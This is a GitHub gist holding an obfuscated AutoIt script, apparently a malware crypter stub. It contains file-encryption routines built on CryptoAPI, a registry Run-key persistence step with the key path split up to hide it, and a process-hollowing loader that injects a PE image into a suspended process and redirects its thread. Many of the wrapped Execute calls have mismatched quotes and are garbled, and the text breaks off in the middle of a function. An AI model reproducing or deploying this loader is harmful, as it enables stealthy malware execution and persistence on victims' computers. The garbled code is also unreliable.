Created
August 2, 2012 05:56
-
-
Save TkTech/3234198 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$SU = "0" | |
#Region | |
#AutoIt3Wrapper_UseUpx=n | |
#AutoIt3Wrapper_res_requestedExecutionLevel=asInvoker | |
#EndRegion | |
Global Const $137 = 1 | |
Global Const $140 = 24 | |
Global Const $139 = -268435456 | |
Global Const $105 = 4 | |
Global Const $106 = 2 | |
Global Const $133 = 1 | |
Global Const $134 = 1 | |
Global Const $CALG_MD2 = 32769 | |
Global Const $CALG_MD4 = 32770 | |
Global Const $136 = 32771 | |
Global Const $CALG_SHA1 = 32772 | |
Global Const $CALG_3DES = 26115 | |
Global Const $CALG_AES_128 = 26126 | |
Global Const $CALG_AES_192 = 26127 | |
Global Const $CALG_AES22_256 = 26128 | |
Global Const $CALG_DES = 26113 | |
Global Const $CALG_RC2 = 26114 | |
Global Const $CALG_RC4 = 26625 | |
Global Const $CALG_USERKEY = 4660 | |
Global $102[3] | |
Func _1() | |
If _VER233462BRTBTR() = 0 Then | |
Local $101 = DllOpen("Advapi32.dll") | |
If @error Then Return SetError(1, 0, False) | |
Execute(__FU32xx1223523fdsdfsSet($101)")) | |
Local $103 | |
Local $138 = $140 | |
If @OSVersion = "WIN_2000" Then $138 = $137 | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $138, "dword", $139)")) | |
If @error Or Not $103[0] Then | |
Execute(DllClose(__FU32xx1223523fdsdfs())")) | |
Return SetError(2, 0, False) | |
Else | |
Execute(__ergherg3485235236Set($103[1])")) | |
EndIf | |
EndIf | |
Execute(_ver233462brtbtrInc()")) | |
Return True | |
EndFunc | |
Func _2() | |
_VER233462BRTBTRDEC() | |
If _VER233462BRTBTR() = 0 Then | |
DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptReleaseContext", "handle", __ERGHERG3485235236(), "dword", 0) | |
DllClose(__FU32XX1223523FDSDFS()) | |
EndIf | |
EndFunc | |
Func _3($131, $109, $132 = $136) | |
Local $103 | |
Local $104 | |
Local $107 | |
Local $118 | |
Local $115 | |
Execute(_1()")) | |
Do | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptCreateHash", "handle", __ERGHERG3485235236(), "uint", $132, "ptr", 0, "dword", 0, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$104 = Execute( $103[5]")) | |
$107 = Execute( DllStructCreate("byte[" & BinaryLen($131) & "]")")) | |
Execute(DllStructSetData($107, 1, $131)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptHashData", "handle", $104, "struct*", $107, "dword", DllStructGetSize($107), "dword", $134)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDeriveKey", "handle", __ERGHERG3485235236(), "uint", $109, "handle", $104, "dword", $133, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( $103[5]")) | |
Until True | |
If $104 <> 0 Then DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyHash", "handle", $104) | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _4($129) | |
Local $103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyKey", "handle", $129) | |
Local $130 = @error | |
Execute(_2()")) | |
If $130 Or Not $103[0] Then | |
Return SetError(1, 0, False) | |
Else | |
Return SetError(0, 0, True) | |
EndIf | |
EndFunc | |
Func _5($108, $110, $109, $125 = True) | |
Local $107 | |
Local $118 | |
Local $115 | |
Local $135 | |
Local $103 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptEncrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "ptr", 0, "dword*", BinaryLen($108), "dword", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$135 = Execute( $103[6]")) | |
$107 = Execute( DllStructCreate("byte[" & $135 & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptEncrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "struct*", $107, "dword*", BinaryLen($108), "dword", DllStructGetSize($107)) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($107, 1)")) | |
Until True | |
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _6($108, $110, $109, $125 = True) | |
Local $107 | |
Local $118 | |
Local $115 | |
Local $127 | |
Local $128 | |
Local $103 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
$107 = Execute( DllStructCreate("byte[" & BinaryLen($108) + 1000 & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptDecrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "struct*", $107, "dword*", BinaryLen($108))")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$128 = Execute( $103[6]")) | |
$127 = Execute( DllStructCreate("byte[" & $128 & "]", DllStructGetPtr($107))")) | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($127, 1)")) | |
Until True | |
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _7($108, $109, $125 = True, $104 = 0) | |
Local $118 | |
Local $115 = 0 | |
Local $126 | |
Local $103 | |
Local $107 = 0 | |
Execute(_1()")) | |
Do | |
If $104 = 0 Then | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptCreateHash", "handle", __ERGHERG3485235236(), "uint", $109, "ptr", 0, "dword", 0, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$104 = Execute( $103[5]")) | |
EndIf | |
$107 = Execute( DllStructCreate("byte[" & BinaryLen($108) & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptHashData", "handle", $104, "struct*", $107, "dword", DllStructGetSize($107), "dword", $134)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
If $125 Then | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptGetHashParam", "handle", $104, "dword", $105, "dword*", 0, "dword*", 4, "dword", 0)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$126 = Execute( $103[3]")) | |
$107 = Execute( DllStructCreate("byte[" & $126 & "]")")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptGetHashParam", "handle", $104, "dword", $106, "struct*", $107, "dword*", DllStructGetSize($107), "dword", 0)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($107, 1)")) | |
Else | |
$115 = Execute( $104")) | |
EndIf | |
Until True | |
If $104 <> 0 And $125 Then DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyHash", "handle", $104) | |
Execute(_2()")) | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _8($124, $109) | |
Local $122 | |
Local $118, $115 | |
Local $123 = 0 | |
Local $111 | |
Execute(_1()")) | |
Do | |
$122 = Execute( FileOpen($124, 16)")) | |
If $122 = -1 Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($122, 512 * 1024)")) | |
If @error Then | |
$115 = _7($111, $109, True, $123) | |
If @error Then | |
$115 = Execute( -1")) | |
$118 = Execute( 2")) | |
ExitLoop 2 | |
EndIf | |
ExitLoop 2 | |
Else | |
$123 = _7($111, $109, False, $123) | |
If @error Then | |
$115 = Execute( -1")) | |
$118 = Execute( 3")) | |
ExitLoop 2 | |
EndIf | |
EndIf | |
Until False | |
Until True | |
Execute(_2()")) | |
If $122 <> -1 Then FileClose($122) | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _9($121, $120, $110, $109) | |
Local $114, $112 | |
Local $118 = 0, $115 = True | |
Local $111 | |
Local $117 = FileGetSize($121) | |
Local $IREAD = 0 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
$114 = Execute( FileOpen($121, 16)")) | |
If @error Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$112 = Execute( FileOpen($120, 26)")) | |
If @error Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($114, 1024 * 1024)")) | |
$IREAD += Execute( BinaryLen($111)")) | |
If $IREAD = $117 Then | |
$111 = _5($111, $110, $CALG_USERKEY, True) | |
If @error Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
ExitLoop 2 | |
Else | |
$111 = _5($111, $110, $CALG_USERKEY, False) | |
If @error Then | |
$118 = Execute( 5")) | |
$115 = Execute( -1")) | |
ExitLoop 2 | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
EndIf | |
Until False | |
Until True | |
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
If $114 <> -1 Then FileClose($114) | |
If $112 <> -1 Then FileClose($112) | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _DEC23($119, $12, $113, $116) | |
Local $114, $112 | |
Local $118 = 0, $115 = True | |
Local $111 | |
Local $117 = FileGetSize($119) | |
Local $IREAD = 0 | |
Execute(_1()")) | |
Do | |
If $116 <> $CALG_USERKEY Then | |
$113 = _3($113, $116) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
$114 = Execute( FileOpen($119, 16)")) | |
If @error Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$112 = Execute( FileOpen($12, 26)")) | |
If @error Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($114, 1024 * 1024)")) | |
$IREAD += Execute( BinaryLen($111)")) | |
If $IREAD = $117 Then | |
$111 = _6($111, $113, $CALG_USERKEY, True) | |
If @error Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
ExitLoop 2 | |
Else | |
$111 = _6($111, $113, $CALG_USERKEY, False) | |
If @error Then | |
$118 = Execute( 5")) | |
$115 = Execute( -1")) | |
ExitLoop 2 | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
EndIf | |
Until False | |
Until True | |
If $116 <> $CALG_USERKEY Then _4($113) | |
_2() | |
If $114 <> -1 Then FileClose($114) | |
If $112 <> -1 Then FileClose($112) | |
Return SetError($118, 0, $115) | |
EndFunc | |
Func _VER233462BRTBTR() | |
Return $102[0] | |
EndFunc | |
Func _VER233462BRTBTRINC() | |
$102[0] += 1 | |
EndFunc | |
Func _VER233462BRTBTRDEC() | |
If $102[0] > 0 Then $102[0] -= 1 | |
EndFunc | |
Func __FU32XX1223523FDSDFS() | |
Return $102[1] | |
EndFunc | |
Func __FU32XX1223523FDSDFSSET($101) | |
$102[1] = $101 | |
EndFunc | |
Func __ERGHERG3485235236() | |
Return $102[2] | |
EndFunc | |
If $SU = "1" Then | |
$POXX = Execute( "SER\SOFTWARE\Microsoft\Windows\Current"")) | |
$KRABBYPATTY69 = Execute( "HKEY_CURRENT_U" & $POXX & "Version\Run"")) | |
Execute(RegWrite($KRABBYPATTY69, @ScriptName, "REG_SZ", @ScriptFullPath)")) | |
EndIf | |
Func __ERGHERG3485235236SET($HCRYPTCONTEXT) | |
$102[2] = $HCRYPTCONTEXT | |
EndFunc | |
Func _PNP23($1, $2 = "", $3 = @AutoItExe) | |
Local $4 = @AutoItX64 | |
Local $5 = Binary($1) | |
Local $6 = DllStructCreate("byte[" & BinaryLen($5) & "]") | |
Execute(DllStructSetData($6, 1, $5)")) | |
Local $7 = DllStructGetPtr($6) | |
Local $8 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "word ShowWindow;" & "word Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") | |
Local $9 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") | |
Local $10 = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $3, "wstr", $2, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($8), "ptr", DllStructGetPtr($9)) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Local $11 = DllStructGetData($9, "Process") | |
Local $12 = DllStructGetData($9, "Thread") | |
If $4 And _FVSDHUWEUGWEUIGHW325235235C($11) Then | |
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0) | |
Return SetError(2, 0, 0) | |
EndIf | |
Local $13, $14 | |
If $4 Then | |
If @OSArch = "X64" Then | |
$13 = Execute( 2")) | |
$14 = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & "dword ContextFlags; dword MxCsr;" & "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & "uint64 Rip;" & "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & "uint64 VectorRegister[52]; uint64 VectorControl;" & "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") | |
Else | |
$13 = Execute( 3")) | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(102, 0, 0) | |
EndIf | |
Else | |
$13 = Execute( 1")) | |
$14 = DllStructCreate("dword ContextFlags;" & "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & "byte ExtendedRegisters[512]") | |
EndIf | |
Local $15 | |
Switch $13 | |
Case 1 | |
$15 = Execute( 0x10007")) | |
Case 2 | |
$15 = Execute( 0x100007")) | |
Case 3 | |
$15 = Execute( 0x80027")) | |
EndSwitch | |
Execute(DllStructSetData($14, "ContextFlags", $15)")) | |
$10 = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $12, "ptr", DllStructGetPtr($14)) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(3, 0, 0) | |
EndIf | |
Local $16 | |
Switch $13 | |
Case 1 | |
$16 = Execute( DllStructGetData($14, "Ebx")")) | |
Case 2 | |
$16 = Execute( DllStructGetData($14, "Rdx")")) | |
Case 3 | |
EndSwitch | |
Local $17 = DllStructCreate("char Magic[2];" & "word BytesOnLastPage;" & "word Pages;" & "word Relocations;" & "word SizeofHeader;" & "word MinimumExtra;" & "word MaximumExtra;" & "word SS;" & "word SP;" & "word Checksum;" & "word IP;" & "word CS;" & "word Relocation;" & "word Overlay;" & "char Reserved[8];" & "word OEMIdentifier;" & "word OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $7) | |
Local $18 = $7 | |
$7 += Execute( DllStructGetData($17, "AddressOfNewExeHeader")")) | |
Local $19 = DllStructGetData($17, "Magic") | |
If Not ($19 == "MZ") Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(4, 0, 0) | |
EndIf | |
Local $20 = DllStructCreate("dword Signature", $7) | |
$7 += Execute( 4")) | |
If DllStructGetData($20, "Signature") <> 17744 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(5, 0, 0) | |
EndIf | |
Local $21 = DllStructCreate("word Machine;" & "word NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "word SizeOfOptionalHeader;" & "word Characteristics", $7) | |
Local $22 = DllStructGetData($21, "NumberOfSections") | |
$7 += Execute( 20")) | |
Local $23 = DllStructCreate("word Magic;", $7) | |
Local $25 = DllStructGetData($23, 1) | |
Local $24 | |
If $25 = 267 Then | |
If $4 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
$24 = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $7) | |
$7 += Execute( 96")) | |
ElseIf $25 = 523 Then | |
If Not $4 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
$24 = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "uint64 ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "uint64 SizeOfStackReserve;" & "uint64 SizeOfStackCommit;" & "uint64 SizeOfHeapReserve;" & "uint64 SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $7) | |
$7 += Execute( 112")) | |
Else | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
Local $26 = DllStructGetData($24, "AddressOfEntryPoint") | |
Local $27 = DllStructGetData($24, "SizeOfHeaders") | |
Local $28 = DllStructGetData($24, "ImageBase") | |
Local $29 = DllStructGetData($24, "SizeOfImage") | |
$7 += Execute( 8")) | |
$7 += Execute( 8")) | |
$7 += Execute( 24")) | |
Local $30 = DllStructCreate("dword VirtualAddress; dword Size", $7) | |
Local $31 = DllStructGetData($30, "VirtualAddress") | |
Local $32 = DllStructGetData($30, "Size") | |
Local $33 | |
If $31 And $32 Then $33 = True | |
If Not $33 Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) | |
$7 += Execute( 88")) | |
Local $34 | |
Local $35 | |
If $33 Then | |
$35 = _REALLY_FFFFFAXX($11, $29) | |
If @error Then | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(_caliban($11, $28)")) | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(101, 1, 0) | |
EndIf | |
EndIf | |
EndIf | |
$34 = Execute( True")) | |
Else | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(_caliban($11, $28)")) | |
$35 = _NOTHING_IS_IMPOSSIBLE($11, $28, $29) | |
If @error Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(101, 0, 0) | |
EndIf | |
EndIf | |
EndIf | |
Execute(DllStructSetData($24, "ImageBase", $35)")) | |
Local $36 = DllStructCreate("byte[" & $29 & "]") | |
Local $37 = DllStructGetPtr($36) | |
Local $38 = DllStructCreate("byte[" & $27 & "]", $18) | |
Execute(DllStructSetData($36, 1, DllStructGetData($38, 1))")) | |
Local $39 | |
Local $40, $41 | |
Local $42, $43 | |
Local $44 | |
For $I = 1 To $22 | |
$39 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "word NumberOfRelocations;" & "word NumberOfLinenumbers;" & "dword Characteristics", $7) | |
$40 = Execute( DllStructGetData($39, "SizeOfRawData")")) | |
$41 = Execute( $18 + DllStructGetData($39, "PointerToRawData")")) | |
$42 = Execute( DllStructGetData($39, "VirtualAddress")")) | |
$43 = Execute( DllStructGetData($39, "UnionOfVirtualSizeAndPhysicalAddress")")) | |
If $43 And $43 < $40 Then $40 = $43 | |
If $40 Then | |
Execute(DllStructSetData(DllStructCreate("byte[" & $40 & "]", $37 + $42), 1, DllStructGetData(DllStructCreate("byte[" & $40 & "]", $41), 1))")) | |
EndIf | |
If $34 Then | |
If $42 <= $31 And $42 + $40 > $31 Then | |
$44 = Execute( DllStructCreate("byte[" & $32 & "]", $41 + ($31 - $42))")) | |
EndIf | |
EndIf | |
$7 += Execute( 40")) | |
Next | |
If $34 Then _XVWRG243GGGGG($37, $44, $35, $28, $25 = 523) | |
$10 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $11, "ptr", $35, "ptr", $37, "dword_ptr", $29, "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(7, 0, 0) | |
EndIf | |
Local $45 = DllStructCreate("byte InheritedAddressSpace;" & "byte ReadImageFileExecOptions;" & "byte BeingDebugged;" & "byte Spare;" & "ptr Mutant;" & "ptr ImageBaseAddress;" & "ptr LoaderData;" & "ptr ProcessParameters;" & "ptr SubSystemData;" & "ptr ProcessHeap;" & "ptr FastPebLock;" & "ptr FastPebLockRoutine;" & "ptr FastPebUnlockRoutine;" & "dword EnvironmentUpdateCount;" & "ptr KernelCallbackTable;" & "ptr EventLogSection;" & "ptr EventLog;" & "ptr FreeList;" & "dword TlsExpansionCounter;" & "ptr TlsBitmap;" & "dword TlsBitmapBits[2];" & "ptr ReadOnlySharedMemoryBase;" & "ptr ReadOnlySharedMemoryHeap;" & "ptr ReadOnlyStaticServerData;" & "ptr AnsiCodePageData;" & "ptr OemCodePageData;" & "ptr UnicodeCaseTableData;" & "dword NumberOfProcessors;" & "dword NtGlobalFlag;" & "byte Spare2[4];" & "int64 CriticalSectionTimeout;" & "dword HeapSegmentReserve;" & "dword HeapSegmentCommit;" & "dword HeapDeCommitTotalFreeThreshold;" & "dword HeapDeCommitFreeBlockThreshold;" & "dword NumberOfHeaps;" & "dword MaximumNumberOfHeaps;" & "ptr ProcessHeaps;" & "ptr GdiSharedHandleTable;" & "ptr ProcessStarterHelper;" & "ptr GdiDCAttributeList;" & "ptr LoaderLock;" & "dword OSMajorVersion;" & "dword OSMinorVersion;" & "dword OSBuildNumber;" & "dword OSPlatformId;" & "dword ImageSubSystem;" & "dword ImageSubSystemMajorVersion;" & "dword ImageSubSystemMinorVersion;" & "dword GdiHandleBuffer[34];" & "dword PostProcessInitRoutine;" & "dword TlsExpansionBitmap;" & "byte TlsExpansionBitmapBits[128];" & "dword SessionId") | |
$10 = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $11, "ptr", $16, "ptr", DllStructGetPtr($45), "dword_ptr", DllStructGetSize($45), "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(8, 0, 0) | |
EndIf | |
Execute(DllStructSetData($45, "ImageBaseAddress", $35)")) | |
$10 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $11, "ptr", $16, "ptr", DllStructGetPtr($45), "dword_ptr", DllStructGetSize($45), "dword_ptr*", 0) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(9, 0, 0) | |
EndIf | |
Switch $13 | |
Case 1 | |
Execute(DllStructSetData($14, "Eax", $35 + $26)")) | |
Case 2 | |
Execute(DllStructSetData($14, "Rcx", $35 + $26)")) | |
Case 3 | |
EndSwitch | |
$10 = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $12, "ptr", DllStructGetPtr($14)) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(10, 0, 0) | |
EndIf | |
$10 = Execute( DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $12)")) | |
If @error Or $10[0] = -1 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(11, 0, 0) | |
EndIf | |
Execute(DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $11)")) | |
Execute(DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $12)")) | |
Return DllStructGetData($9, "ProcessId") | |
EndFunc | |
Func _NOTHING_IS_IMPOSSIBLE($11, $61, $51) | |
Local $10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", $61, "dword_ptr", $51, "dword", 4096, "dword", 64) | |
If @error Or Not $10[0] Then | |
$10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", $61, "dword_ptr", $51, "dword", 12288, "dword", 64) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
EndIf | |
Return $10[0] | |
EndFunc | |
Func _XVWRG243GGGGG($37, $46, $47, $48, $49) | |
Local $50 = $47 - $48 | |
Local $51 = DllStructGetSize($46) | |
Local $52 = DllStructGetPtr($46) | |
Local $53, $54 | |
Local $42, $55, $56 | |
Local $57, $58, $59 | |
Local $60 = 3 + 7 * $49 | |
While $54 < $51 | |
$53 = Execute( DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $52 + $54)")) | |
$42 = Execute( DllStructGetData($53, "VirtualAddress")")) | |
$55 = Execute( DllStructGetData($53, "SizeOfBlock")")) | |
